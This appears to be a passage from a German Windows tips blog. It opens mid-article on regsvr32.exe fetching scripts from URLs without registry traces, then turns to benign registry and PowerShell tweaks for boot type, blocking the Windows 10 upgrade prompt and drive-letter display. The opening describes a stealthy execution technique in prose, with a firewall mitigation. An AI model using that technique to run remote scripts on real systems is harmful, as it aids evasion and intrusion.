Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann „regsvr32.exe“ über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Überprüfen, wie Windows gestartet wurde (Schnellstart oder nicht)

Microsoft Logo

Mit Windows 8 hat Microsoft das Startverhalten des Betriebssystems stark angepasst. Das Hauptziel war die Bootzeit deutlich zu verringern. Abgesehen von einigen Problemen, auf die ich hier nicht weiter eingehen möchte, wurde dies auch erfolgreich realisiert. Das entsprechende Feature nennt sich Schnellstart, wird aber oft auch als Fast Boot oder mit der englischen Bezeichnung Fast startup bezeichnet.

Leider ist es oft nicht ganz klar, ob der Schnellstart wirklich funktioniert und wie Windows das letzte Mal gestartet wurde. Nachfolgend ein kurzer PowerShell-Befehl, der euch diese Frage beantwortet.

Get-WinEvent -ProviderName Microsoft-Windows-Kernel-boot -MaxEvents 60 | Where-Object {$_.id -like "27"};

Anschließend wird eine Liste der letzten Bootvorgänge angezeigt. Die Spalte „Message“ enthält die von uns gesuchte Information. Dort können drei unterschiedliche Werte aufgeführt werden:

  • 0x0 – Normaler Start nach einem vollständigen Shutdown.
  • 0x1 – Schnellstart nach einem hybriden Shutdown.
  • 0x2 – Fortsetzen aus dem Ruhezustand.

Windows 10 Upgrade blockieren

Windows 10 Logo

Nach wie vor wirbt Microsoft unter Windows 7 und Windows 8.1 recht aufdringlich für das Upgrade auf Windows 10. Selbst wer den Upgrade-Hinweis bereits entfernt hatte, bekommt ihn mittlerweile wieder zu Gesicht. Das liegt daran, dass Microsoft das dafür verantwortliche Windows-Update KB3035583 in einer neuen Revision veröffentlicht hat. Darüber hinaus berichten einige Nutzer davon, dass die GWX-Applikation bei jedem Start bzw. bei jeder Aktivierung aus dem Standby-Modus abstürzt. Die Fehlermeldung muss dann jedes Mal geschlossen werden.

Beim jüngsten Patchday wurde das Upgrade auf Windows 10 sogar standardmäßig von der Windows-Update-Funktion zur Verfügung gestellt. Mittlerweile hat sich aber herausgestellt, dass dies laut Microsoft ein Fehler war und nur einen kleinen Teil der Nutzer von Windows 7 bzw. 8.1 betroffen hat.

Kurzum der Upgrade-Hinweis ist mehr als nervig und möchte von vielen Windows-Usern entfernt werden. Um diesen Weg etwas zu vereinfachen, biete ich ein Registry-Skript an, welches mit Administratorrechten ausgeführt werden muss.

Download Registry-Skript zum Blockieren vom Windows 10 Upgrade

Wer möchte kann die Änderungen in der Registry natürlich auch von Hand erledigen:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\GWX]
"DisableGWX"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade]
"AllowOSUpgrade"=dword:00000000
"ReservationsAllowed"=dword:00000000

Nach einem Neustart sollte der störende Upgrade-Hinweis endgültig der Vergangenheit angehören. Falls doch nicht, könnt ihr alternativ auch das PowerShell-Skript von der c’t ausprobieren. Wenn auch das nichts hilft, bleibt euch wohl nichts anderes übrig als den Hinweis zu ertragen oder alternativ das Upgrade auf Windows 10 durchzuführen ;-)

Windows 10 Upgrade-Hinweis entfernen

Microsoft Logo
Die Tipps hier bringen mittlerweile keinen Erfolg mehr, deshalb habe ich einen neuen Artikel veröffentlicht:
Windows 10 Upgrade blockieren

Windows 10 Upgrade HinweisSeit Montag können Nutzer von Windows 7 und Windows 8.1 das kostenlose Upgrade auf das neue Windows 10 reservieren. Gleichzeitig hat Microsoft ein Update verteilt, welches alle entsprechenden Nutzer auf diese Möglichkeit mit einem Icon in der Taskleiste hinweist (siehe Screenshot).

Allerdings bleibt das Upgrade-Symbol dauerhaft im Tray eingeblendet, auch wenn eine Reservierung getätigt wurde. Nachfolgend zeige ich euch drei Wege, wie ihr das nervige Tray-Icon wieder entfernen könnt.

Registrierungs-Editor

Die zuverlässigste Möglichkeit zum entfernen des Upgrade-Hinweises auf Windows 10 verbirgt sich in der Registry.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
  3. HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade
  4. Falls die letzten beiden Schlüssel des Pfads nicht existieren ist das entsprechende Windows-Update noch nicht installiert. Die Schlüssel können dann einfach von Hand angelegt werden. Im Punkt 3 beschriebenen Pfad muss der Wert „ReservationsAllowed“ auf „0“ gesetzt werden.

(via)

Update deinstallieren

Die dritte Möglichkeit ist das entsprechende Windows-Update KB3035583 zu deinstallieren, welches für den Upgrade-Hinweis verantwortlich ist. Die Deinstallation kann über „Windows Update“ und „Installierte Updates“ erfolgen. Nach der erfolgreichen Deinstallation muss das Update KB3035583 allerdings noch versteckt werden, da es ansonsten erneut auf dem System installiert wird.

Windows 10 Upgrade ausblenden

Icon verstecken

Das Ausblenden des Upgrade-Symbols im System Tray sollte für die meisten Nutzer ausreichend sein. Dazu klickt man auf das „Pfeil nach oben“-Icon im System Tray links neben der Uhrzeit und wählt anschließend „Anpassen“ aus. Im neu geöffneten Fenster muss der Eintrag „GWX“ auf „Symbol und Benachrichtigungen ausblenden“ gestellt werden. Fertig.

Windows 10 Upgrade ausblenden

Windows Laufwerksbuchstaben vor dem Namen anzeigen

Im Windows Explorer werden die Laufwerksbuchstaben standardmäßig hinter dem Namen der Laufwerke angezeigt. In einigen Fällen ist es aber sinnvoll den Laufwerksbuchstaben vor dem Namen anzeigen zu lassen, beispielsweise wenn viele Netzlaufwerke verwendet werden. Mit einer kleinen Änderung in der Registry lässt sich dies bewerkstelligen. Dieser Tipp funktioniert unter Windows 7, Windows 8 bzw. Windows 8.1 sowie Windows 10.

Windows Laufwerksbuchstaben

  1. Den Registrierungs-Editor mit Administratorrechten starten. Am einfachsten funktioniert dies über die Suchfunktion.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
  3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „ShowDriveLettersFirst“ erstellt werden.
  4. Der Wert muss auf „4“ gesetzt werden. Wer die Laufwerksbuchstaben wieder nach dem Namen sehen möchte, kann den Wert auf „0“ setzen.
  5. Nach einem Neustart bzw. nach dem Ab- und wieder Anmelden sind die Änderungen wirksam.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Laufwerksbuchstaben_Registry